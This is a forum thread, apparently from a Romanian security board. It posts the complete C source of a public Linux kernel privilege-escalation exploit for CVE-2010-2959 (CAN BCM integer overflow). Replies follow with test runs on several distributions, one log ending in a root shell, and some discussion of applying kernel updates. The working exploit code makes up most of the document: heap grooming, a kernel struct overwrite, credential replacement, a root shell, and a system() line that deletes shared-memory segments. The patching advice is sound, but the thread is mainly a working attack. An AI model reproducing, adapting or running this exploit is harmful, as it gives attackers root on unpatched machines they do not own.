Jump to content
Nytro

Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit

Recommended Posts

Posted

Il mai incearca cineva? Nu merge la mine, "Symbol table not available, aborting".

/*
* i-CAN-haz-MODHARDEN.c
*
* Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2959
*
* Ben Hawkes discovered an integer overflow in the Controller Area Network
* (CAN) subsystem when setting up frame content and filtering certain
* messages. An attacker could send specially crafted CAN traffic to crash
* the system or gain root privileges.
*
* Usage:
*
* $ gcc i-can-haz-modharden.c -o i-can-haz-modharden
* $ ./i-can-haz-modharden
* ...
* [+] launching root shell!
* # id
* uid=0(root) gid=0(root)
*
* Notes:
*
* The allocation pattern of the CAN BCM module gives us some desirable
* properties for smashing the SLUB. We control the kmalloc with a 16-byte
* granularity allowing us to place our allocation in the SLUB cache of our
* choosing (we'll use kmalloc-96 and smash a shmid_kernel struct for
* old-times sake). The allocation can also be made in its own discrete
* stage before the overwrite which allows us to be a bit more conservative
* in ensuring the proper layout of our SLUB cache.
*
* To exploit the vulnerability, we first create a BCM RX op with a crafted
* nframes to trigger the integer overflow during the kmalloc. On the second
* call to update the existing RX op, we bypass the E2BIG check since the
* stored nframes in the op is large, yet has an insufficiently sized
* allocation associated with it. We then have a controlled write into the
* adjacent shmid_kernel object in the 96-byte SLUB cache.
*
* However, while we control the length of the SLUB overwrite via a
* memcpy_fromiovec operation, there exists a memset operation that directly
* follows which zeros out last_frames, likely an adjacent allocation, with
* the same malformed length, effectively nullifying our shmid smash. To
* work around this, we take advantage of the fact that copy_from_user can
* perform partial writes on x86 and trigger an EFAULT by setting up a
* truncated memory mapping as the source for the memcpy_fromiovec operation,
* allowing us to smash the necessary amount of memory and then pop out and
* return early before the memset operation occurs.
*
* We then perform a dry-run and detect the shmid smash via an EIDRM errno
* from shmat() caused by an invalid ipc_perm sequence number. Once we're
* sure we have a shmid_kernel under our control we re-smash it with the
* malformed version and redirect control flow to our credential modifying
* calls mapped in user space.
*
* Distros: please use grsecurity's MODHARDEN or SELinux's module_request
* to restrict unprivileged loading of uncommon packet families. Allowing
* the loading of poorly-written PF modules just adds a non-trivial and
* unnecessary attack surface to the kernel.
*
* Targeted for 32-bit Ubuntu Lucid 10.04 (2.6.32-21-generic), but ports
* easily to other vulnerable kernels/distros. Careful, it could use some
* post-exploitation stability love as well.
*
* Props to twiz, sgrakkyu, spender, qaaz, and anyone else I missed that
* this exploit borrows code from.
*/

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <inttypes.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/mman.h>
#include <sys/stat.h>

#define SLUB "kmalloc-96"
#define ALLOCATION 96
#define FILLER 100

#ifndef PF_CAN
#define PF_CAN 29
#endif

#ifndef CAN_BCM
#define CAN_BCM 2
#endif

struct sockaddr_can {
sa_family_t can_family;
int can_ifindex;
union {
struct { uint32_t rx_id, tx_id; } tp;
} can_addr;
};

struct can_frame {
uint32_t can_id;
uint8_t can_dlc;
uint8_t data[8] __attribute__((aligned(8)));
};

struct bcm_msg_head {
uint32_t opcode;
uint32_t flags;
uint32_t count;
struct timeval ival1, ival2;
uint32_t can_id;
uint32_t nframes;
struct can_frame frames[0];
};

#define RX_SETUP 5
#define RX_DELETE 6
#define CFSIZ sizeof(struct can_frame)
#define MHSIZ sizeof(struct bcm_msg_head)
#define IPCMNI 32768
#define EIDRM 43
#define HDRLEN_KMALLOC 8

struct list_head {
struct list_head *next;
struct list_head *prev;
};

struct super_block {
struct list_head s_list;
unsigned int s_dev;
unsigned long s_blocksize;
unsigned char s_blocksize_bits;
unsigned char s_dirt;
uint64_t s_maxbytes;
void *s_type;
void *s_op;
void *dq_op;
void *s_qcop;
void *s_export_op;
unsigned long s_flags;
} super_block;

struct mutex {
unsigned int count;
unsigned int wait_lock;
struct list_head wait_list;
void *owner;
};

struct inode {
struct list_head i_hash;
struct list_head i_list;
struct list_head i_sb_list;
struct list_head i_dentry_list;
unsigned long i_ino;
unsigned int i_count;
unsigned int i_nlink;
unsigned int i_uid;
unsigned int i_gid;
unsigned int i_rdev;
uint64_t i_version;
uint64_t i_size;
unsigned int i_size_seqcount;
long i_atime_tv_sec;
long i_atime_tv_nsec;
long i_mtime_tv_sec;
long i_mtime_tv_nsec;
long i_ctime_tv_sec;
long i_ctime_tv_nsec;
uint64_t i_blocks;
unsigned int i_blkbits;
unsigned short i_bytes;
unsigned short i_mode;
unsigned int i_lock;
struct mutex i_mutex;
unsigned int i_alloc_sem_activity;
unsigned int i_alloc_sem_wait_lock;
struct list_head i_alloc_sem_wait_list;
void *i_op;
void *i_fop;
struct super_block *i_sb;
void *i_flock;
void *i_mapping;
char i_data[84];
void *i_dquot_1;
void *i_dquot_2;
struct list_head i_devices;
void *i_pipe_union;
unsigned int i_generation;
unsigned int i_fsnotify_mask;
void *i_fsnotify_mark_entries;
struct list_head inotify_watches;
struct mutex inotify_mutex;
} inode;

struct dentry {
unsigned int d_count;
unsigned int d_flags;
unsigned int d_lock;
int d_mounted;
void *d_inode;
struct list_head d_hash;
void *d_parent;
} dentry;

struct file_operations {
void *owner;
void *llseek;
void *read;
void *write;
void *aio_read;
void *aio_write;
void *readdir;
void *poll;
void *ioctl;
void *unlocked_ioctl;
void *compat_ioctl;
void *mmap;
void *open;
void *flush;
void *release;
void *fsync;
void *aio_fsync;
void *fasync;
void *lock;
void *sendpage;
void *get_unmapped_area;
void *check_flags;
void *flock;
void *splice_write;
void *splice_read;
void *setlease;
} op;

struct vfsmount {
struct list_head mnt_hash;
void *mnt_parent;
void *mnt_mountpoint;
void *mnt_root;
void *mnt_sb;
struct list_head mnt_mounts;
struct list_head mnt_child;
int mnt_flags;
const char *mnt_devname;
struct list_head mnt_list;
struct list_head mnt_expire;
struct list_head mnt_share;
struct list_head mnt_slave_list;
struct list_head mnt_slave;
struct vfsmount *mnt_master;
struct mnt_namespace *mnt_ns;
int mnt_id;
int mnt_group_id;
int mnt_count;
} vfsmount;

struct file {
struct list_head fu_list;
struct vfsmount *f_vfsmnt;
struct dentry *f_dentry;
void *f_op;
unsigned int f_lock;
unsigned long f_count;
} file;

struct kern_ipc_perm {
unsigned int lock;
int deleted;
int id;
unsigned int key;
unsigned int uid;
unsigned int gid;
unsigned int cuid;
unsigned int cgid;
unsigned int mode;
unsigned int seq;
void *security;
};

struct shmid_kernel {
struct kern_ipc_perm shm_perm;
struct file *shm_file;
unsigned long shm_nattch;
unsigned long shm_segsz;
time_t shm_atim;
time_t shm_dtim;
time_t shm_ctim;
unsigned int shm_cprid;
unsigned int shm_lprid;
void *mlock_user;
} shmid_kernel;

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

int __attribute__((regparm(3)))
kernel_code(struct file *file, void *vma)
{
commit_creds(prepare_kernel_cred(0));
return -1;
}

unsigned long
get_symbol(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[512];
int ret = 0, oldstyle;

f = fopen("/proc/kallsyms", "r");
if (f == NULL) {
f = fopen("/proc/ksyms", "r");
if (f == NULL)
return 0;
oldstyle = 1;
}

while (ret != EOF) {
if (!oldstyle) {
ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sname);
} else {
ret = fscanf(f, "%p %s\n", (void **) &addr, sname);
if (ret == 2) {
char *p;
if (strstr(sname, "_O/") || strstr(sname, "_S.")) {
continue;
}
p = strrchr(sname, '_');
if (p > ((char *) sname + 5) && !strncmp(p - 3, "smp", 3)) {
p = p - 4;
while (p > (char *)sname && *(p - 1) == '_') {
p--;
}
*p = '\0';
}
}
}
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
fclose(f);
return addr;
}
}
fclose(f);

return 0;
}

int
check_slabinfo(char *cache, int *active_out, int *total_out)
{
FILE *fp;
char name[64], slab[256];
int active, total, diff;

memset(slab, 0, sizeof(slab));
memset(name, 0, sizeof(name));

fp = fopen("/proc/slabinfo", "r");
if (!fp) {
printf("[-] sorry, /proc/slabinfo is not available!");
exit(1);
}

fgets(slab, sizeof(slab) - 1, fp);
while (1) {
fgets(slab, sizeof(slab) - 1, fp);
sscanf(slab, "%s %u %u", name, &active, &total);
diff = total - active;
if (strcmp(name, cache) == 0) {
break;
}
}
fclose(fp);

if (active_out) {
*active_out = active;
}
if (total_out) {
*total_out = total;
}
return diff;
}

void
trigger(void)
{
int *shmids;
int i, ret, sock, cnt, base, smashed;
int diff, active, total, active_new, total_new;
int len, sock_len, mmap_len;
struct sockaddr_can addr;
struct bcm_msg_head *msg;
void *efault;
char *buf;

printf("[+] creating PF_CAN socket...\n");

sock = socket(PF_CAN, SOCK_DGRAM, CAN_BCM);
if (sock < 0) {
printf("[-] kernel lacks CAN packet family support\n");
exit(1);
}

printf("[+] connecting PF_CAN socket...\n");

memset(&addr, 0, sizeof(addr));
addr.can_family = PF_CAN;

ret = connect(sock, (struct sockaddr *) &addr, sizeof(addr));
if (sock < 0) {
printf("[-] could not connect CAN socket\n");
exit(1);
}

len = MHSIZ + (CFSIZ * (ALLOCATION / 16));
msg = malloc(len);
memset(msg, 0, len);
msg->can_id = 2959;
msg->nframes = (UINT_MAX / CFSIZ) + (ALLOCATION / 16) + 1;

printf("[+] clearing out any active OPs via RX_DELETE...\n");

msg->opcode = RX_DELETE;
ret = send(sock, msg, len, 0);

printf("[+] removing any active user-owned shmids...\n");

system("for shmid in `cat /proc/sysvipc/shm | awk '{print $2}'`; do ipcrm -m $shmid > /dev/null 2>&1; done;");

printf("[+] massaging " SLUB " SLUB cache with dummy allocations\n");

diff = check_slabinfo(SLUB, &active, &total);

shmids = malloc(sizeof(int) * diff * 10);

cnt = diff * 10;
for (i = 0; i < cnt; ++i) {
diff = check_slabinfo(SLUB, &active, &total);
if (diff == 0) {
break;
}
shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);
}
base = i;

if (diff != 0) {
printf("[-] inconsistency detected with SLUB cache allocation, please try again\n");
exit(1);
}

printf("[+] corrupting BCM OP with truncated allocation via RX_SETUP...\n");

i = base;
cnt = i + FILLER;
for (; i < cnt; ++i) {
shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);
}

msg->opcode = RX_SETUP;
ret = send(sock, msg, len, 0);
if (ret < 0) {
printf("[-] kernel rejected malformed CAN header\n");
exit(1);
}

i = base + FILLER;
cnt = i + FILLER;
for (; i < cnt; ++i) {
shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT);
}

printf("[+] mmap'ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec...\n");

mmap_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 3);
sock_len = MHSIZ + (CFSIZ * (ALLOCATION / 16) * 4);
efault = mmap(NULL, mmap_len, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

printf("[+] mmap'ed mapping of length %d at %p\n", mmap_len, efault);

printf("[+] smashing adjacent shmid with dummy payload via malformed RX_SETUP...\n");

msg = (struct bcm_msg_head *) efault;
memset(msg, 0, mmap_len);
msg->can_id = 2959;
msg->nframes = (ALLOCATION / 16) * 4;

msg->opcode = RX_SETUP;
ret = send(sock, msg, mmap_len, 0);
if (ret != -1 && errno != EFAULT) {
printf("[-] couldn't trigger EFAULT, exploit aborting!\n");
exit(1);
}

printf("[+] seeking out the smashed shmid_kernel...\n");

i = base;
cnt = i + FILLER + FILLER;
for (; i < cnt; ++i) {
ret = (int) shmat(shmids[i], NULL, SHM_RDONLY);
if (ret == -1 && errno == EIDRM) {
smashed = i;
break;
}
}
if (i == cnt) {
printf("[-] could not find smashed shmid, trying running the exploit again!\n");
exit(1);
}

printf("[+] discovered our smashed shmid_kernel at shmid[%d] = %d\n", i, shmids[i]);

printf("[+] re-smashing the shmid_kernel with exploit payload...\n");

shmid_kernel.shm_perm.seq = shmids[smashed] / IPCMNI;

buf = (char *) msg;
memcpy(&buf[MHSIZ + (ALLOCATION * 2) + HDRLEN_KMALLOC], &shmid_kernel, sizeof(shmid_kernel));

msg->opcode = RX_SETUP;
ret = send(sock, msg, mmap_len, 0);
if (ret != -1 && errno != EFAULT) {
printf("[-] couldn't trigger EFAULT, exploit aborting!\n");
exit(1);
}

ret = (int) shmat(shmids[smashed], NULL, SHM_RDONLY);
if (ret == -1 && errno != EIDRM) {
setresuid(0, 0, 0);
setresgid(0, 0, 0);

printf("[+] launching root shell!\n");

execl("/bin/bash", "/bin/bash", NULL);
exit(0);
}

printf("[-] exploit failed! retry?\n");
}

void
setup(void)
{
printf("[+] looking for symbols...\n");

commit_creds = (_commit_creds) get_symbol("commit_creds");
if (!commit_creds) {
printf("[-] symbol table not availabe, aborting!\n");
}

prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
if (!prepare_kernel_cred) {
printf("[-] symbol table not availabe, aborting!\n");
}

printf("[+] setting up exploit payload...\n");

super_block.s_flags = 0;

inode.i_size = 4096;
inode.i_sb = &super_block;
inode.inotify_watches.next = &inode.inotify_watches;
inode.inotify_watches.prev = &inode.inotify_watches;
inode.inotify_mutex.count = 1;

dentry.d_count = 4096;
dentry.d_flags = 4096;
dentry.d_parent = NULL;
dentry.d_inode = &inode;

op.mmap = &kernel_code;
op.get_unmapped_area = &kernel_code;

vfsmount.mnt_flags = 0;
vfsmount.mnt_count = 1;

file.fu_list.prev = &file.fu_list;
file.fu_list.next = &file.fu_list;
file.f_dentry = &dentry;
file.f_vfsmnt = &vfsmount;
file.f_op = &op;

shmid_kernel.shm_perm.key = IPC_PRIVATE;
shmid_kernel.shm_perm.uid = getuid();
shmid_kernel.shm_perm.gid = getgid();
shmid_kernel.shm_perm.cuid = getuid();
shmid_kernel.shm_perm.cgid = getgid();
shmid_kernel.shm_perm.mode = -1;
shmid_kernel.shm_file = &file;
}

int
main(int argc, char **argv)
{
setup();
trigger();
return 0;
}

nytro@rst:~> uname -a
Linux rst 2.6.34-12-default #1 SMP 2010-06-29 02:39:08 +0200 i686 i686 i386 GNU/Linux

http://www.exploit-db.com/exploits/14814/

Posted

Probat pe Centos:

Linux localhost.localdomain 2.6.18-164.el5 #1 SMP Thu Sep 3 03:28:30 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux

Si nimic..

[+] looking for symbols...

[-] symbol table not availabe, aborting!

[-] symbol table not availabe, aborting!

[+] setting up exploit payload...

[+] creating PF_CAN socket...

[-] kernel lacks CAN packet family support

[http@localhost ~]$

BTW: A mai obtinut cineva asta la compilare?

s.c: In function trigger:

s.c:544: warning: cast from pointer to integer of different size

s.c:571: warning: cast from pointer to integer of different size

Posted (edited)

Un modul este f?cut din func?ii si variabile , o data ce vine înc?rcat de c?tre un kernel linux , fiecare variabila , func?iile ?i adresa de memorie a acestora vin publicate in Kernel Simbol Table

Acest lucru se întîmpla deoarece pune la dispozi?ia a altor module noi care vor veni înc?rcate mai tîrziu de c?tre kernel posibilitatea de a folosi func?iile puse la dispozi?ie de c?tre celelalte module

Kernel Symbol Table tine cont de toate adresele de memorie puse la dispozi?ie de c?tre un modul

Am testat in Open Suse 11, Debian5 , Ubuntu 8.10, Ubuntu 9.10


[+] looking for symbols...
[-] symbol table not availabe, aborting!
[-] symbol table not availabe, aborting!
[+] setting up exploit payload...
[+] creating PF_CAN socket...
[-] kernel lacks CAN packet family support

Nu am reu?it s? în?eleg exact problema , daca codul din exploit nu reuseste sa g?seasc? Kernel Symbol Table , nu va reu?i s? ob?in? anumite adrese de memorie de care are nevoie

Oricum din cate vad testul a fost f?cut intrun sistem Ubuntu 10 , dac? careva are posibilitatea rog s? încerce

Nu ?tiu exact cum vine configurat kernelul in Ubuntu 10, probabil va trebui modificat pu?in codul de exploit pt alte sisteme

Edit:

Tested on Debian Sqeeze 2.6.32-5-amd64

  

[+] looking for symbols...
[+] resolved symbol commit_creds to 0xffffffff81067fc5
[+] resolved symbol prepare_kernel_cred to 0xffffffff81067ec8
[+] setting up exploit payload...
[+] creating PF_CAN socket...
[+] connecting PF_CAN socket...
[+] clearing out any active OPs via RX_DELETE...
[+] removing any active user-owned shmids...
[+] massaging kmalloc-96 SLUB cache with dummy allocations
[-] inconsistency detected with SLUB cache allocation, please try again

Edited by pyth0n3
Posted

A trebuit ceva activat la Linux-ul respectiv, aditional? Patch-urile de la grsec erau? Cat despre SElinux (este si in Ubuntu? Stiu ca este in FC). Buna treaba.

Danke Nytro pentru aducere la cunostinta.

Posted

Daca se face update in ubuntu , exploit will fail , pt ca vin instalate patch-urile

Deci pt a rezolva problema treabuie dat doar un simplu

sudo apt-get update && sudo apt-get dist-upgrade 

Posted

Probat again pe Ubuntu 10.04.1 LTS \n \l (kernel = 2.6.32-24-generic) and fail :|

ed3@daneel:~$ id
uid=1006(ed3) gid=1006(ed3) groups=1006(ed3)
ed3@daneel:~$ ./s
[+] looking for symbols...
[+] resolved symbol commit_creds to 0xffffffff8108bd90
[+] resolved symbol prepare_kernel_cred to 0xffffffff8108c170
[+] setting up exploit payload...
[+] creating PF_CAN socket...
[+] connecting PF_CAN socket...
[+] clearing out any active OPs via RX_DELETE...
[+] removing any active user-owned shmids...
[+] massaging kmalloc-96 SLUB cache with dummy allocations
[-] inconsistency detected with SLUB cache allocation, please try again
ed3@daneel:~$

Posted
Probat again pe Ubuntu 10.04.1 LTS \n \l (kernel = 2.6.32-24-generic) and fail :|

Cum am mai zis daca tiau facut update nu mai merge, nu conteaza versiunea de Kernel , pt ca oricum nu iti dau alta ti-au aplicat doar patch-urile

Posted
eval@eval-laptop:/tmp/exploit$ ./expl0it

[+] looking for symbols...

[+] resolved symbol commit_creds to 0xc016dd80

[+] resolved symbol prepare_kernel_cred to 0xc016e0c0

[+] setting up exploit payload...

[+] creating PF_CAN socket...

[+] connecting PF_CAN socket...

[+] clearing out any active OPs via RX_DELETE...

[+] removing any active user-owned shmids...

[+] massaging kmalloc-96 SLUB cache with dummy allocations

[+] corrupting BCM OP with truncated allocation via RX_SETUP...

[+] mmap'ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec...

[+] mmap'ed mapping of length 328 at 0xb7859000

[+] smashing adjacent shmid with dummy payload via malformed RX_SETUP...

[+] seeking out the smashed shmid_kernel...

[+] discovered our smashed shmid_kernel at shmid[150] = 6750377

[+] re-smashing the shmid_kernel with exploit payload...

[+] launching root shell!

root@eval-laptop:/tmp/exploit# id

uid=0(root) gid=0(root)

root@eval-laptop:/tmp/exploit#

Mie mi-a mers.

uname -a

Linux eval-laptop 2.6.32-23-generic #37-Ubuntu SMP Fri Jun 11 07:54:58 UTC 2010 i686 GNU/Linux

cat /etc/issue

Ubuntu 10.04 LTS \n \l

Deasemenea, poate sa-mi explice cineva mai exact cum functioneaza? Am inteles ideea... ce face el, dar in detaliu si usor de inteles. Cum identifica adresele de memorie in Kernel Symbol Table? Este foarte avansat (complex) din cate vad, nu ca as fi eu guru, din contra.

Later edit:

Ce este si mai ciudat asta:

apt-get update

Hit http://ftp.gts.lug.ro lucid Release.gpg

Ign http://ftp.gts.lug.ro/ubuntu/ lucid/main Translation-en_US

Ign http://ftp.gts.lug.ro/ubuntu/ lucid/restricted Translation-en_US

Ign http://ftp.gts.lug.ro/ubuntu/ lucid/universe Translation-en_US

Ign http://ftp.gts.lug.ro/ubuntu/ lucid/multiverse Translation-en_US

Hit http://ftp.gts.lug.ro lucid-updates Release.gpg

Ign http://ftp.gts.lug.ro/ubuntu/ lucid-updates/main Translation-en_US

Ign http://ftp.gts.lug.ro/ubuntu/ lucid-updates/restricted Translation-en_US

Ign http://ftp.gts.lug.ro/ubuntu/ lucid-updates/universe Translation-en_US

Ign http://ftp.gts.lug.ro/ubuntu/ lucid-updates/multiverse Translation-en_US

Hit http://ftp.gts.lug.ro lucid-security Release.gpg

Ign http://ftp.gts.lug.ro/ubuntu/ lucid-security/main Translation-en_US

Ign http://ftp.gts.lug.ro/ubuntu/ lucid-security/restricted Translation-en_US

Ign http://ftp.gts.lug.ro/ubuntu/ lucid-security/universe Translation-en_US

Ign http://ftp.gts.lug.ro/ubuntu/ lucid-security/multiverse Translation-en_US

Hit http://ftp.gts.lug.ro lucid Release

Hit http://ftp.gts.lug.ro lucid-updates Release

Hit http://ftp.gts.lug.ro lucid-security Release

Hit http://ftp.gts.lug.ro lucid/main Packages

Hit http://ftp.gts.lug.ro lucid/restricted Packages

Hit http://ftp.gts.lug.ro lucid/main Sources

Hit http://ftp.gts.lug.ro lucid/restricted Sources

Hit http://ftp.gts.lug.ro lucid/universe Packages

Hit http://ftp.gts.lug.ro lucid/universe Sources

Hit http://ftp.gts.lug.ro lucid/multiverse Packages

Hit http://ftp.gts.lug.ro lucid/multiverse Sources

Hit http://ftp.gts.lug.ro lucid-updates/main Packages

Hit http://ftp.gts.lug.ro lucid-updates/restricted Packages

Hit http://ftp.gts.lug.ro lucid-updates/main Sources

Hit http://ftp.gts.lug.ro lucid-updates/restricted Sources

Hit http://ftp.gts.lug.ro lucid-updates/universe Packages

Hit http://ftp.gts.lug.ro lucid-updates/universe Sources

Hit http://ftp.gts.lug.ro lucid-updates/multiverse Packages

Hit http://ftp.gts.lug.ro lucid-updates/multiverse Sources

Hit http://ftp.gts.lug.ro lucid-security/main Packages

Hit http://ftp.gts.lug.ro lucid-security/restricted Packages

Hit http://ftp.gts.lug.ro lucid-security/main Sources

Hit http://ftp.gts.lug.ro lucid-security/restricted Sources

Hit http://ftp.gts.lug.ro lucid-security/universe Packages

Hit http://ftp.gts.lug.ro lucid-security/universe Sources

Hit http://ftp.gts.lug.ro lucid-security/multiverse Packages

Hit http://archive.canonical.com lucid Release.gpg

Ign http://archive.canonical.com/ubuntu/ lucid/partner Translation-en_US

Hit http://ftp.gts.lug.ro lucid-security/multiverse Sources

Hit http://archive.canonical.com lucid Release

Hit http://archive.canonical.com lucid/partner Packages

Hit http://archive.canonical.com lucid/partner Sources

Reading package lists... Done

Bineinteles ca din "Update manager" nu pot sa updatez nimic, imi spune ca sistemul meu a fost updatat acum o ora, dar inca este vulnerabil. Am incercat inca odata exploit-ul si tot merge, nu a fost deloc patch-uit. De ce imi ignora anumite surse din repository cum ar fii:

Ign http://ftp.gts.lug.ro/ubuntu/ lucid-security/main Translation-en_US

Ign http://ftp.gts.lug.ro/ubuntu/ lucid-security/restricted Translation-en_US

Ign http://ftp.gts.lug.ro/ubuntu/ lucid-security/universe Translation-en_US

Ign http://ftp.gts.lug.ro/ubuntu/ lucid-security/multiverse Translation-en_US

?

Mortii si ranitii de situatie! Am scris ditamai update-ul la post spunand cum am reusit sa patchuiesc si cand am rulat iar exploit-ul cu patch-urile bagate mi-a inghetat totul. In fine, ideea era:

- am reusit sa rezolv problema selectand "Main server" din "Software Sources" apoi m-a atentionat ca lista este out-of-date (nu stiu ce lista, parca asa mi-a zis, probabil etc/apt/sources.list) si sa-i dau reload, ceea ce am si facut

- patch-urile au fost instalate printr-un "apt-get upgrade" ce a durat putin mai mult (nu i-am mai dat upgrade si update de foarte mult timp) rezultand in:

cat /etc/issue

Ubuntu 10.04.1 LTS \n \l

# acum incerc iar exploit-ul revin cu edit sa nu imi inghete iar o.s.-ul

Edit (ce dracu?!):

eval@eval-laptop:/tmp/exploit$ ls

expl.c exploit

eval@eval-laptop:/tmp/exploit$ ./exploit

[+] looking for symbols...

[+] resolved symbol commit_creds to 0xc016dd80

[+] resolved symbol prepare_kernel_cred to 0xc016e0c0

[+] setting up exploit payload...

[+] creating PF_CAN socket...

[+] connecting PF_CAN socket...

[+] clearing out any active OPs via RX_DELETE...

[+] removing any active user-owned shmids...

[+] massaging kmalloc-96 SLUB cache with dummy allocations

[+] corrupting BCM OP with truncated allocation via RX_SETUP...

[+] mmap'ing truncated memory to short-circuit/EFAULT the memcpy_fromiovec...

[+] mmap'ed mapping of length 328 at 0xb78d1000

[+] smashing adjacent shmid with dummy payload via malformed RX_SETUP...

[+] seeking out the smashed shmid_kernel...

[+] discovered our smashed shmid_kernel at shmid[149] = 5603492

[+] re-smashing the shmid_kernel with exploit payload...

[+] launching root shell!

root@eval-laptop:/tmp/exploit# id

uid=0(root) gid=0(root)

root@eval-laptop:/tmp/exploit# cat /etc/issue

Ubuntu 10.04.1 LTS \n \l

root@eval-laptop:/tmp/exploit# # WHAT THE FUCK?!

root@eval-laptop:/tmp/exploit#

?!

// Inca un apt-get upgrade:

eval@eval-laptop:/tmp/exploit$ sudo apt-get upgrade

[sudo] password for eval:

Reading package lists... Done

Building dependency tree

Reading state information... Done

The following packages have been kept back:

linux-generic linux-headers-generic linux-image-generic

The following packages will be upgraded:

wget

1 upgraded, 0 newly installed, 0 to remove and 3 not upgraded.

Need to get 289kB of archives.

After this operation, 4,096B of additional disk space will be used.

Do you want to continue [Y/n]? Y

Get:1 http://archive.ubuntu.com/ubuntu/ lucid-security/main wget 1.12-1.1ubuntu2.1 [289kB]

Fetched 289kB in 0s (610kB/s)

(Reading database ... 149534 files and directories currently installed.)

Preparing to replace wget 1.12-1.1ubuntu2 (using .../wget_1.12-1.1ubuntu2.1_i386.deb) ...

Unpacking replacement wget ...

Processing triggers for install-info ...

Processing triggers for man-db ...

Setting up wget (1.12-1.1ubuntu2.1) ...

Haha, idiotul de mine, bineinteles ca exploit-ul inca mai merge! Eu l-am stins de la buton atunci cand a inghetat o.s.-ul asa ca nu si-a mai dat upgrade cum a trebuit.

Aparent 3 pachete nu au fost instalate (din punctul meu de vedere fiind critice -- ele nemaifiind instalate exploit-ul inca mai merge).

apt-get upgrade

Reading package lists... Done

Building dependency tree

Reading state information... Done

The following packages have been kept back:

linux-generic linux-headers-generic linux-image-generic

0 upgraded, 0 newly installed, 0 to remove and 3 not upgraded.

linux-generic:

The following NEW packages will be installed:

linux-image-2.6.32-24-generic

The following packages will be upgraded:

linux-generic linux-image-generic

2 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.

Need to get 31.5MB of archives.

After this operation, 99.0MB of additional disk space will be used.

Do you want to continue [Y/n]? y

Get:1 http://archive.ubuntu.com/ubuntu/ lucid-updates/main linux-image-2.6.32-24-generic 2.6.32-24.42 [31.5MB]

Get:2 http://archive.ubuntu.com/ubuntu/ lucid-updates/main linux-generic 2.6.32.24.25 [4,022B]

Get:3 http://archive.ubuntu.com/ubuntu/ lucid-updates/main linux-image-generic 2.6.32.24.25 [4,032B]

Fetched 31.5MB in 14s (2,230kB/s)

Selecting previously deselected package linux-image-2.6.32-24-generic.

(Reading database ... 149534 files and directories currently installed.)

Unpacking linux-image-2.6.32-24-generic (from .../linux-image-2.6.32-24-generic_2.6.32-24.42_i386.deb) ...

Done.

Preparing to replace linux-generic 2.6.32.23.24 (using .../linux-generic_2.6.32.24.25_i386.deb) ...

Unpacking replacement linux-generic ...

Preparing to replace linux-image-generic 2.6.32.23.24 (using .../linux-image-generic_2.6.32.24.25_i386.deb) ...

Unpacking replacement linux-image-generic ...

Setting up linux-image-2.6.32-24-generic (2.6.32-24.42) ...

Running depmod.

update-initramfs: Generating /boot/initrd.img-2.6.32-24-generic

Running postinst hook script /usr/sbin/update-grub.

Generating grub.cfg ...

Found linux image: /boot/vmlinuz-2.6.32-24-generic

Found initrd image: /boot/initrd.img-2.6.32-24-generic

Found linux image: /boot/vmlinuz-2.6.32-23-generic

Found initrd image: /boot/initrd.img-2.6.32-23-generic

Found linux image: /boot/vmlinuz-2.6.32-21-generic

Found initrd image: /boot/initrd.img-2.6.32-21-generic

Found memtest86+ image: /boot/memtest86+.bin

Found |bla bla| on /dev/sda1

Found |bla bla| on /dev/sda2

done

Examining /etc/kernel/postinst.d.

run-parts: executing /etc/kernel/postinst.d/dkms 2.6.32-24-generic /boot/vmlinuz-2.6.32-24-generic

run-parts: executing /etc/kernel/postinst.d/nvidia-common 2.6.32-24-generic /boot/vmlinuz-2.6.32-24-generic

run-parts: executing /etc/kernel/postinst.d/pm-utils 2.6.32-24-generic /boot/vmlinuz-2.6.32-24-generic

Setting up linux-image-generic (2.6.32.24.25) ...

Setting up linux-generic (2.6.32.24.25) ...

linux-headers-generic:

The following extra packages will be installed:

linux-headers-2.6.32-24 linux-headers-2.6.32-24-generic

The following NEW packages will be installed:

linux-headers-2.6.32-24 linux-headers-2.6.32-24-generic

The following packages will be upgraded:

linux-headers-generic

1 upgraded, 2 newly installed, 0 to remove and 0 not upgraded.

Need to get 10.6MB of archives.

After this operation, 85.3MB of additional disk space will be used.

Do you want to continue [Y/n]? Y

Get:1 http://archive.ubuntu.com/ubuntu/ lucid-updates/main linux-headers-2.6.32-24 2.6.32-24.42 [9,879kB]

Get:2 http://archive.ubuntu.com/ubuntu/ lucid-updates/main linux-headers-2.6.32-24-generic 2.6.32-24.42 [740kB]

Get:3 http://archive.ubuntu.com/ubuntu/ lucid-updates/main linux-headers-generic 2.6.32.24.25 [4,022B]

Fetched 10.6MB in 6s (1,578kB/s)

Selecting previously deselected package linux-headers-2.6.32-24.

(Reading database ... 153043 files and directories currently installed.)

Unpacking linux-headers-2.6.32-24 (from .../linux-headers-2.6.32-24_2.6.32-24.42_all.deb) ...

Selecting previously deselected package linux-headers-2.6.32-24-generic.

